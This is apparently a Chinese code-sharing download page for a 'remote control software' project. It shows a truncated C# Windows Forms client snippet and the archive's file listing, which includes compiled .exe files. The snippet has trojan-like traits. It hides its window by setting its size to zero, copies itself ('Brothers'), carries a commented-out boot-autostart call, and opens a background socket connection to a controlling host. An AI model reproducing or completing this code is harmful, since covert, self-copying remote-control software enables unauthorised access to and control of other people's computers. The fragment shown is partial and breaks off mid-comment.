資源簡介
遠控系列軟件2(遠控服務器端)
代碼片段和文件信息
using?Microsoft.Win32;
using?System;
using?System.Collections.Generic;
using?System.ComponentModel;
using?System.Data;
using?System.Diagnostics;
using?System.Drawing;
using?System.Linq;
using?System.Net;
using?System.Net.Sockets;
using?System.Runtime.InteropServices;
using?System.Text;
using?System.Threading;
using?System.Windows.Forms;
using?System.IO;
namespace?_99.遠控客戶端
{
????public?partial?class?Client?:?Form
????{
????????public?Client()
????????{
????????????InitializeComponent();
????????}
????????bool?b?=?true;
????????Socket?socketSend;
????????private?void?Client_Load(object?sender?EventArgs?e)
????????{
????????????//Startup();??//加開機啟動
????????????this.Width?=?0;
????????????this.Height?=?0;
????????????Brothers();//復制一份
????????????Control.CheckForIllegalCrossThreadCalls?=?false;//關閉線程監視
????????????//和主機連接起來——————為了避免假死,就弄個線程過來
????????????Thread?th?=?new?Thread(ClientConnect);
????????????th.IsBackground?=?true;//[后臺線程--主窗體被關閉了,程序會立
?屬性????????????大小?????日期????時間???名稱
-----------?---------??----------?-----??----
?????文件?????363566??2014-08-12?21:49??99.遠控客戶端\20.ico
?????文件???????3907??2014-08-12?21:49??99.遠控客戶端\99.遠控客戶端.csproj
?????文件?????740864??2014-08-16?17:06??99.遠控客戶端\bin\Debug\99.遠控客戶端.exe
?????文件??????30208??2014-08-16?17:06??99.遠控客戶端\bin\Debug\99.遠控客戶端.pdb
?????文件??????24216??2014-08-16?17:07??99.遠控客戶端\bin\Debug\99.遠控客戶端.vshost.exe
?????文件????????490??2012-06-02?22:34??99.遠控客戶端\bin\Debug\99.遠控客戶端.vshost.exe.manifest
?????文件???????8399??2014-08-16?17:06??99.遠控客戶端\Client.cs
?????文件???????2504??2014-08-16?16:04??99.遠控客戶端\Client.Designer.cs
?????文件?????551663??2014-08-16?16:04??99.遠控客戶端\Client.resx
?????文件????????765??2014-08-16?17:07??99.遠控客戶端\obj\Debug\99.遠控客戶端.csproj.FileListAbsolute.txt
?????文件????????978??2014-08-16?16:24??99.遠控客戶端\obj\Debug\99.遠控客戶端.csproj.GenerateResource.Cache
?????文件???????2211??2014-08-16?16:24??99.遠控客戶端\obj\Debug\99.遠控客戶端.csprojResolveAssemblyReference.cache
?????文件?????740864??2014-08-16?17:06??99.遠控客戶端\obj\Debug\99.遠控客戶端.exe
?????文件??????30208??2014-08-16?17:06??99.遠控客戶端\obj\Debug\99.遠控客戶端.pdb
?????文件???????1453??2014-08-15?14:01??99.遠控客戶端\obj\Debug\DesignTimeResolveAssemblyReferences.cache
?????文件???????6894??2014-08-12?21:54??99.遠控客戶端\obj\Debug\DesignTimeResolveAssemblyReferencesInput.cache
?????文件?????364132??2014-08-16?16:24??99.遠控客戶端\obj\Debug\_99.遠控客戶端.Client.resources
?????文件????????180??2014-08-16?16:24??99.遠控客戶端\obj\Debug\_99.遠控客戶端.Properties.Resources.resources
?????文件????????501??2014-08-12?13:44??99.遠控客戶端\Program.cs
?????文件???????1420??2014-08-12?21:56??99.遠控客戶端\Properties\AssemblyInfo.cs
?????文件???????2890??2014-08-12?13:44??99.遠控客戶端\Properties\Resources.Designer.cs
?????文件???????5612??2014-08-12?13:44??99.遠控客戶端\Properties\Resources.resx
?????文件???????1106??2014-08-12?13:44??99.遠控客戶端\Properties\Settings.Designer.cs
?????文件????????249??2014-08-12?13:44??99.遠控客戶端\Properties\Settings.settings
?????目錄??????????0??2014-08-12?13:44??99.遠控客戶端\obj\Debug\TempPE
?????目錄??????????0??2014-08-16?16:24??99.遠控客戶端\bin\Debug
?????目錄??????????0??2014-08-12?13:44??99.遠控客戶端\bin\Release
?????目錄??????????0??2014-08-16?17:06??99.遠控客戶端\obj\Debug
?????目錄??????????0??2014-08-12?13:44??99.遠控客戶端\bin
?????目錄??????????0??2014-08-12?13:44??99.遠控客戶端\obj
............此處省略5個文件信息
評論
共有 條評論